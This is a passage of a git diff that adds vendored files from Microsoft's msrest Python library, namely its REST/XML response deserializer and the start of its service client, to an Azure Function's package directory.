in key: + dict_keys = _FLATTEN.split(key) + if len(dict_keys) == 1: + key = _decode_attribute_map_key(dict_keys[0]) + break + working_key = _decode_attribute_map_key(dict_keys[0]) + working_data = attribute_key_case_insensitive_extractor(working_key, None, working_data) + if working_data is None: + # If at any point while following flatten JSON path see None, it means + # that all properties under are None as well + # https://github.com/Azure/msrest-for-python/issues/197 + return None + key = '.'.join(dict_keys[1:]) + + if working_data: + return attribute_key_case_insensitive_extractor(key, None, working_data) + +def last_rest_key_extractor(attr, attr_desc, data): + """Extract the attribute in "data" based on the last part of the JSON path key. + """ + key = attr_desc['key'] + dict_keys = _FLATTEN.split(key) + return attribute_key_extractor(dict_keys[-1], None, data) + +def last_rest_key_case_insensitive_extractor(attr, attr_desc, data): + """Extract the attribute in "data" based on the last part of the JSON path key. + + This is the case insensitive version of "last_rest_key_extractor" + """ + key = attr_desc['key'] + dict_keys = _FLATTEN.split(key) + return attribute_key_case_insensitive_extractor(dict_keys[-1], None, data) + +def attribute_key_extractor(attr, _, data): + return data.get(attr) + +def attribute_key_case_insensitive_extractor(attr, _, data): + found_key = None + lower_attr = attr.lower() + for key in data: + if lower_attr == key.lower(): + found_key = key + break + + return data.get(found_key) + +def _extract_name_from_internal_type(internal_type): + """Given an internal type XML description, extract correct XML name with namespace. + + :param dict internal_type: An model type + :rtype: tuple + :returns: A tuple XML name + namespace dict + """ + internal_type_xml_map = getattr(internal_type, "_xml_map", {}) + xml_name = internal_type_xml_map.get('name', internal_type.__name__) + xml_ns = internal_type_xml_map.get("ns", None) + if xml_ns: + xml_name = "{{{}}}{}".format(xml_ns, xml_name) + return xml_name + + +def xml_key_extractor(attr, attr_desc, data): + if isinstance(data, dict): + return None + + # Test if this model is XML ready first + if not isinstance(data, ET.Element): + return None + + xml_desc = attr_desc.get('xml', {}) + xml_name = xml_desc.get('name', attr_desc['key']) + + # Look for a children + is_iter_type = attr_desc['type'].startswith("[") + is_wrapped = xml_desc.get("wrapped", False) + internal_type = attr_desc.get("internalType", None) + internal_type_xml_map = getattr(internal_type, "_xml_map", {}) + + # Integrate namespace if necessary + xml_ns = xml_desc.get('ns', internal_type_xml_map.get("ns", None)) + if xml_ns: + xml_name = "{{{}}}{}".format(xml_ns, xml_name) + + # If it's an attribute, that's simple + if xml_desc.get("attr", False): + return data.get(xml_name) + + # If it's x-ms-text, that's simple too + if xml_desc.get("text", False): + return data.text + + # Scenario where I take the local name: + # - Wrapped node + # - Internal type is an enum (considered basic types) + # - Internal type has no XML/Name node + if is_wrapped or (internal_type and (issubclass(internal_type, Enum) or 'name' not in internal_type_xml_map)): + children = data.findall(xml_name) + # If internal type has a local name and it's not a list, I use that name + elif not is_iter_type and internal_type and 'name' in internal_type_xml_map: + xml_name = _extract_name_from_internal_type(internal_type) + children = data.findall(xml_name) + # That's an array + else: + if 
internal_type: # Complex type, ignore itemsName and use the complex type name
+ items_name = _extract_name_from_internal_type(internal_type)
+ else:
+ items_name = xml_desc.get("itemsName", xml_name)
+ children = data.findall(items_name)
+
+ if len(children) == 0:
+ if is_iter_type:
+ if is_wrapped:
+ return None # is_wrapped no node, we want None
+ else:
+ return [] # not wrapped, assume empty list
+ return None # Assume it's not there, maybe an optional node.
+
+ # If is_iter_type and not wrapped, return all found children
+ if is_iter_type:
+ if not is_wrapped:
+ return children
+ else: # Iter and wrapped, should have found one node only (the wrap one)
+ if len(children) != 1:
+ raise DeserializationError(
+ "Tried to deserialize an unwrapped array, but found several nodes '{}'. Maybe you should declare this array as wrapped?".format(
+ xml_name
+ ))
+ return list(children[0]) # Might be empty list and that's ok.
+
+ # Here it's not an iter type; we should have found one element only, or none
+ if len(children) > 1:
+ raise DeserializationError("Found several XML nodes '{}' where only one was expected".format(xml_name))
+ return children[0]
+
+class Deserializer(object):
+ """Response object model deserializer.
+
+ :param dict classes: Class type dictionary for deserializing complex types.
+ :ivar list key_extractors: Ordered list of extractors to be used by this deserializer.
+ """
+
+ basic_types = {str: 'str', int: 'int', bool: 'bool', float: 'float'}
+
+ valid_date = re.compile(
+ r'\d{4}[-]\d{2}[-]\d{2}T\d{2}:\d{2}:\d{2}'
+ r'\.?\d*Z?[-+]?[\d{2}]?:?[\d{2}]?')
+
+ def __init__(self, classes=None):
+ self.deserialize_type = {
+ 'iso-8601': Deserializer.deserialize_iso,
+ 'rfc-1123': Deserializer.deserialize_rfc,
+ 'unix-time': Deserializer.deserialize_unix,
+ 'duration': Deserializer.deserialize_duration,
+ 'date': Deserializer.deserialize_date,
+ 'time': Deserializer.deserialize_time,
+ 'decimal': Deserializer.deserialize_decimal,
+ 'long': Deserializer.deserialize_long,
+ 'bytearray': Deserializer.deserialize_bytearray,
+ 'base64': Deserializer.deserialize_base64,
+ 'object': self.deserialize_object,
+ '[]': self.deserialize_iter,
+ '{}': self.deserialize_dict
+ }
+ self.deserialize_expected_types = {
+ 'duration': (isodate.Duration, datetime.timedelta),
+ 'iso-8601': (datetime.datetime)
+ }
+ self.dependencies = dict(classes) if classes else {}
+ self.key_extractors = [
+ rest_key_extractor,
+ xml_key_extractor
+ ]
+ # Additional properties only work if the "rest_key_extractor" is used to
+ # extract the keys. Making this work with any key extractor is too
+ # complicated, with no real scenario for now.
+ # So adding a flag to disable additional properties detection. This flag should be
+ # used if you expect the deserialization to NOT come from a JSON REST syntax.
+ # Otherwise, results are unexpected.
+ self.additional_properties_detection = True
+
+ def __call__(self, target_obj, response_data, content_type=None):
+ """Call the deserializer to process a REST response.
+
+ :param str target_obj: Target data type to deserialize to.
+ :param requests.Response response_data: REST response object.
+ :param str content_type: Swagger "produces" if available.
+ :raises: DeserializationError if deserialization fails.
+ :return: Deserialized object.
+ """
+ data = self._unpack_content(response_data, content_type)
+ return self._deserialize(target_obj, data)
+
+ def _deserialize(self, target_obj, data):
+ """Call the deserializer on a model.
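+
+ (If "data" already exposes an "_attribute_map", it is treated as a
+ Model instance: its complex attributes are deserialized recursively
+ in place and the same object is returned.)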
+ + Data needs to be already deserialized as JSON or XML ElementTree + + :param str target_obj: Target data type to deserialize to. + :param object data: Object to deserialize. + :raises: DeserializationError if deserialization fails. + :return: Deserialized object. + """ + # This is already a model, go recursive just in case + if hasattr(data, "_attribute_map"): + constants = [name for name, config in getattr(data, '_validation', {}).items() + if config.get('constant')] + try: + for attr, mapconfig in data._attribute_map.items(): + if attr in constants: + continue + value = getattr(data, attr) + if value is None: + continue + local_type = mapconfig['type'] + internal_data_type = local_type.strip('[]{}') + if internal_data_type not in self.dependencies or isinstance(internal_data_type, Enum): + continue + setattr( + data, + attr, + self._deserialize(local_type, value) + ) + return data + except AttributeError: + return + + response, class_name = self._classify_target(target_obj, data) + + if isinstance(response, basestring): + return self.deserialize_data(data, response) + elif isinstance(response, type) and issubclass(response, Enum): + return self.deserialize_enum(data, response) + + if data is None: + return data + try: + attributes = response._attribute_map + d_attrs = {} + for attr, attr_desc in attributes.items(): + # Check empty string. If it's not empty, someone has a real "additionalProperties"... + if attr == "additional_properties" and attr_desc["key"] == '': + continue + raw_value = None + # Enhance attr_desc with some dynamic data + attr_desc = attr_desc.copy() # Do a copy, do not change the real one + internal_data_type = attr_desc["type"].strip('[]{}') + if internal_data_type in self.dependencies: + attr_desc["internalType"] = self.dependencies[internal_data_type] + + for key_extractor in self.key_extractors: + found_value = key_extractor(attr, attr_desc, data) + if found_value is not None: + if raw_value is not None and raw_value != found_value: + msg = ("Ignoring extracted value '%s' from %s for key '%s'" + " (duplicate extraction, follow extractors order)" ) + _LOGGER.warning( + msg, + found_value, + key_extractor, + attr + ) + continue + raw_value = found_value + + value = self.deserialize_data(raw_value, attr_desc['type']) + d_attrs[attr] = value + except (AttributeError, TypeError, KeyError) as err: + msg = "Unable to deserialize to object: " + class_name + raise_with_traceback(DeserializationError, msg, err) + else: + additional_properties = self._build_additional_properties(attributes, data) + return self._instantiate_model(response, d_attrs, additional_properties) + + def _build_additional_properties(self, attribute_map, data): + if not self.additional_properties_detection: + return None + if "additional_properties" in attribute_map and attribute_map.get("additional_properties", {}).get("key") != '': + # Check empty string. If it's not empty, someone has a real "additionalProperties" + return None + if isinstance(data, ET.Element): + data = {el.tag: el.text for el in data} + + known_keys = {_decode_attribute_map_key(_FLATTEN.split(desc['key'])[0]) + for desc in attribute_map.values() if desc['key'] != ''} + present_keys = set(data.keys()) + missing_keys = present_keys - known_keys + return {key: data[key] for key in missing_keys} + + def _classify_target(self, target, data): + """Check to see whether the deserialization target object can + be classified into a subclass. + Once classification has been determined, initialize object. 
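+
+ For instance (a sketch, not from the original source; Animal, Cat and
+ Dog are hypothetical models registered in self.dependencies):
+
+ class Animal(Model):
+ _subtype_map = {'animal_type': {'cat': 'Cat', 'dog': 'Dog'}}
+
+ a payload {"animal_type": "cat"} classifies the "Animal" target into
+ the Cat subclass before instantiation.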
+
+ :param str target: The target object type to deserialize to.
+ :param str/dict data: The response data to deserialize.
+ """
+ if target is None:
+ return None, None
+
+ if isinstance(target, basestring):
+ try:
+ target = self.dependencies[target]
+ except KeyError:
+ return target, target
+
+ try:
+ target = target._classify(data, self.dependencies)
+ except AttributeError:
+ pass # Target is not a Model, no classify
+ return target, target.__class__.__name__
+
+ def failsafe_deserialize(self, target_obj, data, content_type=None):
+ """Ignores any errors encountered in deserialization,
+ and falls back to not deserializing the object. Recommended
+ for use in error deserialization, as we want to return the
+ HttpResponseError to users, and not have them deal with
+ a deserialization error.
+
+ :param str target_obj: The target object type to deserialize to.
+ :param str/dict data: The response data to deserialize.
+ :param str content_type: Swagger "produces" if available.
+ """
+ try:
+ return self(target_obj, data, content_type=content_type)
+ except:
+ _LOGGER.warning(
+ "Ran into a deserialization error. Ignoring since this is failsafe deserialization",
+ exc_info=True
+ )
+ return None
+
+ @staticmethod
+ def _unpack_content(raw_data, content_type=None):
+ """Extract the correct structure for deserialization.
+
+ If raw_data is a PipelineResponse, try to extract the result of RawDeserializer.
+ If we can't, raise. Your Pipeline should have a RawDeserializer.
+
+ If not a pipeline response and raw_data is bytes or string, use content-type
+ to decode it. If no content-type, try JSON.
+
+ If raw_data is something else, bypass all logic and return it directly.
+
+ :param raw_data: Data to be processed.
+ :param content_type: How to parse if raw_data is a string/bytes.
+ :raises JSONDecodeError: If JSON is requested and parsing is impossible.
+ :raises UnicodeDecodeError: If bytes is not UTF-8
+ """
+ # This avoids a circular dependency. We might want to consider that RawDeserializer is more generic
+ # than the pipeline concept, and put it in a toolbox, used both here and in pipeline. TBD.
+ from .pipeline.universal import RawDeserializer
+
+ # Assume this is enough to detect a Pipeline Response without importing it
+ context = getattr(raw_data, "context", {})
+ if context:
+ if RawDeserializer.CONTEXT_NAME in context:
+ return context[RawDeserializer.CONTEXT_NAME]
+ raise ValueError("This pipeline didn't have the RawDeserializer policy; can't deserialize")
+
+ # Assume this is enough to recognize universal_http.ClientResponse without importing it
+ if hasattr(raw_data, "body"):
+ return RawDeserializer.deserialize_from_http_generics(
+ raw_data.text(),
+ raw_data.headers
+ )
+
+ # Assume this is enough to recognize requests.Response without importing it.
+ if hasattr(raw_data, '_content_consumed'):
+ return RawDeserializer.deserialize_from_http_generics(
+ raw_data.text,
+ raw_data.headers
+ )
+
+ if isinstance(raw_data, (basestring, bytes)) or hasattr(raw_data, 'read'):
+ return RawDeserializer.deserialize_from_text(raw_data, content_type)
+ return raw_data
+
+ def _instantiate_model(self, response, attrs, additional_properties=None):
+ """Instantiate a response model passing in deserialized args.
+
+ :param response: The response model class.
+ :param attrs: The deserialized response attributes.
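+
+ A sketch of the effect (Cat being a hypothetical Model subclass):
+ _instantiate_model(Cat, {'name': 'felix'}) returns Cat(name='felix'),
+ with read-only attributes set afterwards via setattr.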
+ """ + if callable(response): + subtype = getattr(response, '_subtype_map', {}) + try: + readonly = [k for k, v in response._validation.items() + if v.get('readonly')] + const = [k for k, v in response._validation.items() + if v.get('constant')] + kwargs = {k: v for k, v in attrs.items() + if k not in subtype and k not in readonly + const} + response_obj = response(**kwargs) + for attr in readonly: + setattr(response_obj, attr, attrs.get(attr)) + if additional_properties: + response_obj.additional_properties = additional_properties + return response_obj + except TypeError as err: + msg = "Unable to deserialize {} into model {}. ".format( + kwargs, response) + raise DeserializationError(msg + str(err)) + else: + try: + for attr, value in attrs.items(): + setattr(response, attr, value) + return response + except Exception as exp: + msg = "Unable to populate response model. " + msg += "Type: {}, Error: {}".format(type(response), exp) + raise DeserializationError(msg) + + def deserialize_data(self, data, data_type): + """Process data for deserialization according to data type. + + :param str data: The response string to be deserialized. + :param str data_type: The type to deserialize to. + :raises: DeserializationError if deserialization fails. + :return: Deserialized object. + """ + if data is None: + return data + + try: + if not data_type: + return data + if data_type in self.basic_types.values(): + return self.deserialize_basic(data, data_type) + if data_type in self.deserialize_type: + if isinstance(data, self.deserialize_expected_types.get(data_type, tuple())): + return data + + is_a_text_parsing_type = lambda x: x not in ["object", "[]", r"{}"] + if isinstance(data, ET.Element) and is_a_text_parsing_type(data_type) and not data.text: + return None + data_val = self.deserialize_type[data_type](data) + return data_val + + iter_type = data_type[0] + data_type[-1] + if iter_type in self.deserialize_type: + return self.deserialize_type[iter_type](data, data_type[1:-1]) + + obj_type = self.dependencies[data_type] + if issubclass(obj_type, Enum): + if isinstance(data, ET.Element): + data = data.text + return self.deserialize_enum(data, obj_type) + + except (ValueError, TypeError, AttributeError) as err: + msg = "Unable to deserialize response data." + msg += " Data: {}, {}".format(data, data_type) + raise_with_traceback(DeserializationError, msg, err) + else: + return self._deserialize(obj_type, data) + + def deserialize_iter(self, attr, iter_type): + """Deserialize an iterable. + + :param list attr: Iterable to be deserialized. + :param str iter_type: The type of object in the iterable. + :rtype: list + """ + if attr is None: + return None + if isinstance(attr, ET.Element): # If I receive an element here, get the children + attr = list(attr) + if not isinstance(attr, (list, set)): + raise DeserializationError("Cannot deserialize as [{}] an object of type {}".format( + iter_type, + type(attr) + )) + return [self.deserialize_data(a, iter_type) for a in attr] + + def deserialize_dict(self, attr, dict_type): + """Deserialize a dictionary. + + :param dict/list attr: Dictionary to be deserialized. Also accepts + a list of key, value pairs. + :param str dict_type: The object type of the items in the dictionary. 
+ :rtype: dict + """ + if isinstance(attr, list): + return {x['key']: self.deserialize_data(x['value'], dict_type) for x in attr} + + if isinstance(attr, ET.Element): + # Transform value into {"Key": "value"} + attr = {el.tag: el.text for el in attr} + return {k: self.deserialize_data(v, dict_type) for k, v in attr.items()} + + def deserialize_object(self, attr, **kwargs): + """Deserialize a generic object. + This will be handled as a dictionary. + + :param dict attr: Dictionary to be deserialized. + :rtype: dict + :raises: TypeError if non-builtin datatype encountered. + """ + if attr is None: + return None + if isinstance(attr, ET.Element): + # Do no recurse on XML, just return the tree as-is + return attr + if isinstance(attr, basestring): + return self.deserialize_basic(attr, 'str') + obj_type = type(attr) + if obj_type in self.basic_types: + return self.deserialize_basic(attr, self.basic_types[obj_type]) + if obj_type is _long_type: + return self.deserialize_long(attr) + + if obj_type == dict: + deserialized = {} + for key, value in attr.items(): + try: + deserialized[key] = self.deserialize_object( + value, **kwargs) + except ValueError: + deserialized[key] = None + return deserialized + + if obj_type == list: + deserialized = [] + for obj in attr: + try: + deserialized.append(self.deserialize_object( + obj, **kwargs)) + except ValueError: + pass + return deserialized + + else: + error = "Cannot deserialize generic object with type: " + raise TypeError(error + str(obj_type)) + + def deserialize_basic(self, attr, data_type): + """Deserialize basic builtin data type from string. + Will attempt to convert to str, int, float and bool. + This function will also accept '1', '0', 'true' and 'false' as + valid bool values. + + :param str attr: response string to be deserialized. + :param str data_type: deserialization data type. + :rtype: str, int, float or bool + :raises: TypeError if string format is not valid. + """ + # If we're here, data is supposed to be a basic type. + # If it's still an XML node, take the text + if isinstance(attr, ET.Element): + attr = attr.text + if not attr: + if data_type == "str": + # None or '', node is empty string. + return '' + else: + # None or '', node with a strong type is None. + # Don't try to model "empty bool" or "empty int" + return None + + if data_type == 'bool': + if attr in [True, False, 1, 0]: + return bool(attr) + elif isinstance(attr, basestring): + if attr.lower() in ['true', '1']: + return True + elif attr.lower() in ['false', '0']: + return False + raise TypeError("Invalid boolean value: {}".format(attr)) + + if data_type == 'str': + return self.deserialize_unicode(attr) + return eval(data_type)(attr) + + @staticmethod + def deserialize_unicode(data): + """Preserve unicode objects in Python 2, otherwise return data + as a string. + + :param str data: response string to be deserialized. + :rtype: str or unicode + """ + # We might be here because we have an enum modeled as string, + # and we try to deserialize a partial dict with enum inside + if isinstance(data, Enum): + return data + + # Consider this is real string + try: + if isinstance(data, unicode): + return data + except NameError: + return str(data) + else: + return str(data) + + @staticmethod + def deserialize_enum(data, enum_obj): + """Deserialize string into enum object. + + If the string is not a valid enum value it will be returned as-is + and a warning will be logged. + + :param str data: Response string to be deserialized. 
If this value is + None or invalid it will be returned as-is. + :param Enum enum_obj: Enum object to deserialize to. + :rtype: Enum + """ + if isinstance(data, enum_obj) or data is None: + return data + if isinstance(data, Enum): + data = data.value + if isinstance(data, int): + # Workaround. We might consider remove it in the future. + # https://github.com/Azure/azure-rest-api-specs/issues/141 + try: + return list(enum_obj.__members__.values())[data] + except IndexError: + error = "{!r} is not a valid index for enum {!r}" + raise DeserializationError(error.format(data, enum_obj)) + try: + return enum_obj(str(data)) + except ValueError: + for enum_value in enum_obj: + if enum_value.value.lower() == str(data).lower(): + return enum_value + # We don't fail anymore for unknown value, we deserialize as a string + _LOGGER.warning("Deserializer is not able to find %s as valid enum in %s", data, enum_obj) + return Deserializer.deserialize_unicode(data) + + @staticmethod + def deserialize_bytearray(attr): + """Deserialize string into bytearray. + + :param str attr: response string to be deserialized. + :rtype: bytearray + :raises: TypeError if string format invalid. + """ + if isinstance(attr, ET.Element): + attr = attr.text + return bytearray(b64decode(attr)) + + @staticmethod + def deserialize_base64(attr): + """Deserialize base64 encoded string into string. + + :param str attr: response string to be deserialized. + :rtype: bytearray + :raises: TypeError if string format invalid. + """ + if isinstance(attr, ET.Element): + attr = attr.text + padding = '=' * (3 - (len(attr) + 3) % 4) + attr = attr + padding + encoded = attr.replace('-', '+').replace('_', '/') + return b64decode(encoded) + + @staticmethod + def deserialize_decimal(attr): + """Deserialize string into Decimal object. + + :param str attr: response string to be deserialized. + :rtype: Decimal + :raises: DeserializationError if string format invalid. + """ + if isinstance(attr, ET.Element): + attr = attr.text + try: + return decimal.Decimal(attr) + except decimal.DecimalException as err: + msg = "Invalid decimal {}".format(attr) + raise_with_traceback(DeserializationError, msg, err) + + @staticmethod + def deserialize_long(attr): + """Deserialize string into long (Py2) or int (Py3). + + :param str attr: response string to be deserialized. + :rtype: long or int + :raises: ValueError if string format invalid. + """ + if isinstance(attr, ET.Element): + attr = attr.text + return _long_type(attr) + + @staticmethod + def deserialize_duration(attr): + """Deserialize ISO-8601 formatted string into TimeDelta object. + + :param str attr: response string to be deserialized. + :rtype: TimeDelta + :raises: DeserializationError if string format invalid. + """ + if isinstance(attr, ET.Element): + attr = attr.text + try: + duration = isodate.parse_duration(attr) + except(ValueError, OverflowError, AttributeError) as err: + msg = "Cannot deserialize duration object." + raise_with_traceback(DeserializationError, msg, err) + else: + return duration + + @staticmethod + def deserialize_date(attr): + """Deserialize ISO-8601 formatted string into Date object. + + :param str attr: response string to be deserialized. + :rtype: Date + :raises: DeserializationError if string format invalid. + """ + if isinstance(attr, ET.Element): + attr = attr.text + if re.search(r"[^\W\d_]", attr, re.I + re.U): + raise DeserializationError("Date must have only digits and -. Received: %s" % attr) + # This must NOT use defaultmonth/defaultday. 
Using None ensures this raises an exception.
+ return isodate.parse_date(attr, defaultmonth=None, defaultday=None)
+
+ @staticmethod
+ def deserialize_time(attr):
+ """Deserialize ISO-8601 formatted string into time object.
+
+ :param str attr: response string to be deserialized.
+ :rtype: datetime.time
+ :raises: DeserializationError if string format invalid.
+ """
+ if isinstance(attr, ET.Element):
+ attr = attr.text
+ if re.search(r"[^\W\d_]", attr, re.I + re.U):
+ raise DeserializationError("Time must have only digits and :. Received: %s" % attr)
+ return isodate.parse_time(attr)
+
+ @staticmethod
+ def deserialize_rfc(attr):
+ """Deserialize RFC-1123 formatted string into Datetime object.
+
+ :param str attr: response string to be deserialized.
+ :rtype: Datetime
+ :raises: DeserializationError if string format invalid.
+ """
+ if isinstance(attr, ET.Element):
+ attr = attr.text
+ try:
+ parsed_date = email.utils.parsedate_tz(attr)
+ date_obj = datetime.datetime(
+ *parsed_date[:6],
+ tzinfo=_FixedOffset(datetime.timedelta(minutes=(parsed_date[9] or 0)/60))
+ )
+ if not date_obj.tzinfo:
+ date_obj = date_obj.astimezone(tz=TZ_UTC)
+ except ValueError as err:
+ msg = "Cannot deserialize to rfc datetime object."
+ raise_with_traceback(DeserializationError, msg, err)
+ else:
+ return date_obj
+
+ @staticmethod
+ def deserialize_iso(attr):
+ """Deserialize ISO-8601 formatted string into Datetime object.
+
+ :param str attr: response string to be deserialized.
+ :rtype: Datetime
+ :raises: DeserializationError if string format invalid.
+ """
+ if isinstance(attr, ET.Element):
+ attr = attr.text
+ try:
+ attr = attr.upper()
+ match = Deserializer.valid_date.match(attr)
+ if not match:
+ raise ValueError("Invalid datetime string: " + attr)
+
+ check_decimal = attr.split('.')
+ if len(check_decimal) > 1:
+ decimal_str = ""
+ for digit in check_decimal[1]:
+ if digit.isdigit():
+ decimal_str += digit
+ else:
+ break
+ if len(decimal_str) > 6:
+ attr = attr.replace(decimal_str, decimal_str[0:6])
+
+ date_obj = isodate.parse_datetime(attr)
+ test_utc = date_obj.utctimetuple()
+ if test_utc.tm_year > 9999 or test_utc.tm_year < 1:
+ raise OverflowError("Hit max or min date")
+ except (ValueError, OverflowError, AttributeError) as err:
+ msg = "Cannot deserialize datetime object."
+ raise_with_traceback(DeserializationError, msg, err)
+ else:
+ return date_obj
+
+ @staticmethod
+ def deserialize_unix(attr):
+ """Deserialize a unix timestamp (seconds since epoch) into a
+ Datetime object.
+
+ :param int attr: Object to be deserialized.
+ :rtype: Datetime
+ :raises: DeserializationError if format invalid
+ """
+ if isinstance(attr, ET.Element):
+ attr = int(attr.text)
+ try:
+ date_obj = datetime.datetime.fromtimestamp(attr, TZ_UTC)
+ except ValueError as err:
+ msg = "Cannot deserialize to unix datetime object."
+ raise_with_traceback(DeserializationError, msg, err)
+ else:
+ return date_obj
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/service_client.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/service_client.py
new file mode 100644
index 0000000..22f0bdd
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/service_client.py
@@ -0,0 +1,388 @@
+# --------------------------------------------------------------------------
+#
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import logging +import os +import sys +try: + from urlparse import urljoin, urlparse +except ImportError: + from urllib.parse import urljoin, urlparse +import warnings + +from typing import List, Any, Dict, Union, IO, Tuple, Optional, Callable, Iterator, cast, TYPE_CHECKING # pylint: disable=unused-import + +from .authentication import Authentication +from .universal_http import ClientRequest, ClientResponse +from .universal_http.requests import ( + RequestsHTTPSender, +) +from .pipeline import Request, Pipeline, HTTPPolicy, SansIOHTTPPolicy +from .pipeline.requests import ( + PipelineRequestsHTTPSender, + RequestsCredentialsPolicy, + RequestsPatchSession +) +from .pipeline.universal import ( + HTTPLogger, + RawDeserializer +) + + +if TYPE_CHECKING: + from .configuration import Configuration # pylint: disable=unused-import + from .universal_http.requests import RequestsClientResponse # pylint: disable=unused-import + import requests # pylint: disable=unused-import + + +_LOGGER = logging.getLogger(__name__) + +class SDKClient(object): + """The base class of all generated SDK client. + """ + def __init__(self, creds, config): + # type: (Any, Configuration) -> None + self._client = ServiceClient(creds, config) + + def close(self): + # type: () -> None + """Close the client if keep_alive is True. + """ + self._client.close() + + def __enter__(self): + # type: () -> SDKClient + self._client.__enter__() + return self + + def __exit__(self, *exc_details): + self._client.__exit__(*exc_details) + + +class _ServiceClientCore(object): + """Service client core methods. + + This contains methods are sans I/O and not tight to sync or async implementation. + :param Configuration config: Service configuration. + :param Authentication creds: Authenticated credentials. + """ + + def __init__(self, config): + # type: (Any, Configuration) -> None + if config is None: + raise ValueError("Config is a required parameter") + self.config = config + + def _request(self, method, url, params, headers, content, form_content): + # type: (str, str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> ClientRequest + """Create ClientRequest object. + + :param str url: URL for the request. + :param dict params: URL query parameters. 
+ :param dict headers: Headers + :param dict form_content: Form content + """ + request = ClientRequest(method, self.format_url(url)) + + if params: + request.format_parameters(params) + + if headers: + request.headers.update(headers) + # All requests should contain a Accept. + # This should be done by Autorest, but wasn't in old Autorest + # Force it for now, but might deprecate it later. + if "Accept" not in request.headers: + _LOGGER.debug("Accept header absent and forced to application/json") + request.headers['Accept'] = 'application/json' + + if content is not None: + request.add_content(content) + + if form_content: + request.add_formdata(form_content) + + return request + + def stream_upload(self, data, callback): + """Generator for streaming request body data. + + :param data: A file-like object to be streamed. + :param callback: Custom callback for monitoring progress. + """ + while True: + chunk = data.read(self.config.connection.data_block_size) + if not chunk: + break + if callback and callable(callback): + callback(chunk, response=None) + yield chunk + + def format_url(self, url, **kwargs): + # type: (str, Any) -> str + """Format request URL with the client base URL, unless the + supplied URL is already absolute. + + :param str url: The request URL to be formatted if necessary. + """ + url = url.format(**kwargs) + parsed = urlparse(url) + if not parsed.scheme or not parsed.netloc: + url = url.lstrip('/') + base = self.config.base_url.format(**kwargs).rstrip('/') + url = urljoin(base + '/', url) + return url + + def get(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> ClientRequest + """Create a GET request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param dict form_content: Form content + """ + request = self._request('GET', url, params, headers, content, form_content) + request.method = 'GET' + return request + + def put(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> ClientRequest + """Create a PUT request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param dict form_content: Form content + """ + request = self._request('PUT', url, params, headers, content, form_content) + return request + + def post(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> ClientRequest + """Create a POST request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param dict form_content: Form content + """ + request = self._request('POST', url, params, headers, content, form_content) + return request + + def head(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> ClientRequest + """Create a HEAD request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. 
+ :param dict headers: Headers + :param dict form_content: Form content + """ + request = self._request('HEAD', url, params, headers, content, form_content) + return request + + def patch(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> ClientRequest + """Create a PATCH request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param dict form_content: Form content + """ + request = self._request('PATCH', url, params, headers, content, form_content) + return request + + def delete(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> ClientRequest + """Create a DELETE request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param dict form_content: Form content + """ + request = self._request('DELETE', url, params, headers, content, form_content) + return request + + def merge(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> ClientRequest + """Create a MERGE request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param dict form_content: Form content + """ + request = self._request('MERGE', url, params, headers, content, form_content) + return request + + +class ServiceClient(_ServiceClientCore): + """REST Service Client. + Maintains client pipeline and handles all requests and responses. + + :param creds: Deprecated, will be removed in next major version. Creds are now read from config.credentials. + :param Configuration config: Service configuration. + """ + + def __init__(self, creds, config): + # type: (Any, Configuration) -> None + super(ServiceClient, self).__init__(config) + + # If not Autorest, check if credentials comes from here and not config + if creds and config.credentials is None: + warnings.warn("Creds parameter is deprecated. Set config.credentials instead.", + DeprecationWarning) + config.credentials = creds + + self.config.pipeline = self._create_default_pipeline() + + def _create_default_pipeline(self): + # type: () -> Pipeline[ClientRequest, RequestsClientResponse] + creds = self.config.credentials + + policies = [ + self.config.user_agent_policy, # UserAgent policy + 